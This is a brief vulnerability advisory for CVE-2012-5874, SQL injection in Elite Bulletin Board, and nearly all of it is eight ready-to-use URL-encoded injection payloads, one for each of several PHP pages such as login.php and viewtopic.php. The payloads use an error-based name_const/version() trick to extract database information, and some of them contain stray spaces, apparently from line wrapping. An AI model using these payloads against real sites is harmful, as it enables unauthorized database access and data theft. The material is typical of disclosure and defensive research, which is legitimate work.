Elite Bulletin Board CVE-2012-5874 Multiple SQL Injection Vulnerabilities

Elite Bulletin Board CVE-2012-5874 Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/groups.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/index.php/%27,%28%28select*from%28selec t%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/login.php/%27,%28%28select*from%28select %20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/quicklogin.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/register.php/%27,%28%28select*from% 28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/viewboard.php/%27,%28%28select*from%2 8select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

http://www.example.com/viewtopic.php/%27,%28%28select *from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&tid=1